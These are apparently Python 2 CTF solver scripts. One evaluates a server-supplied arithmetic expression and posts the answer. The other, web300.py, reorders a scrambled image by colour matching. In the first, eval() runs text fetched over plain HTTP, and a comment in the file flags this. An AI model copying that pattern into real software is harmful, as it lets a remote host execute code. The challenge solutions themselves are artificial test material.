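# Rebuild the expression: only lines starting with a space carry a token,
# either one quoted character at offset 8 or the text from offset 7 onward.
s = ""
for l in eq.split('\n'):
    # startswith() also skips empty lines, where l[0] raised IndexError.
    if not l.startswith(' '):
        continue
    if l[7] == "'":
        s += l[8]
    else:
        s += l[7:-1]

# NOTE(review): `s` is assembled from a server-supplied header fetched over
# plain HTTP, and eval() runs it as Python, so the remote host (or anyone able
# to alter the response in transit) decides what executes here. If the
# expression format is known, check `s` against it before this call.
# The expression is evaluated once and the value reused for printing and posting.
result = eval(s)
print result

# Post the result back with the session cookie from the first response.
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', cookie))
rsp = opener.open("http://176.9.193.13/ASmallCalculationChal411A784Y.php", urllib.urlencode({'result' : str(result)}))
print rsp.read()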

web300.py

#!/usr/bin/env python
from PIL import Image
import urllib2
from cStringIO import StringIO

# Reference picture, reduced to a thumbnail bounded by 4x3 pixels; the colours
# are then picked in the known-correct order.
im = Image.open("image.jpg")
im.thumbnail((4,3), Image.ANTIALIAS)
correct_positions = [10,6,7,11,5,0,8,1,2,4,9,3]
colors = list(im.getdata())
correct_colors = [colors[p] for p in correct_positions]

# Fetch the scrambled picture and remember the session cookie that comes with it.
img_file = urllib2.urlopen("http://176.9.193.13/CxliTo3-ra/image.php")
for l in img_file.info().headers:
    if l.startswith("Set-Cookie:"):
        # Skip the "Set-Cookie: " prefix and the last 10 characters of the line.
        cookie = l[12:-10]
im = Image.open(StringIO(img_file.read()))
im.thumbnail((4,3), Image.ANTIALIAS)
colors = list(im.getdata())

# Greedy matching: for each reference colour take the closest remaining pixel
# (sum of absolute channel differences), then overwrite that pixel with an
# out-of-range colour so it is not picked again.
best_pixels = []
for r, g, b in correct_colors:
    best_diff = 256 * 3
    for index, (r2, g2, b2) in enumerate(colors):
        diff = abs(r-r2) + abs(g-g2) + abs(b-b2)
        if diff < best_diff:
            best_diff = diff
            best_px = index
    colors[best_px] = (9999,9999,9999)
    best_pixels.append(str(best_px))

# Submit the pixel order, colon-separated, together with the session cookie.
print cookie
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', cookie))
rsp = opener.open("http://176.9.193.13/CxliTo3-ra/s.php?order=" + ":".join(best_pixels))
print rsp.read()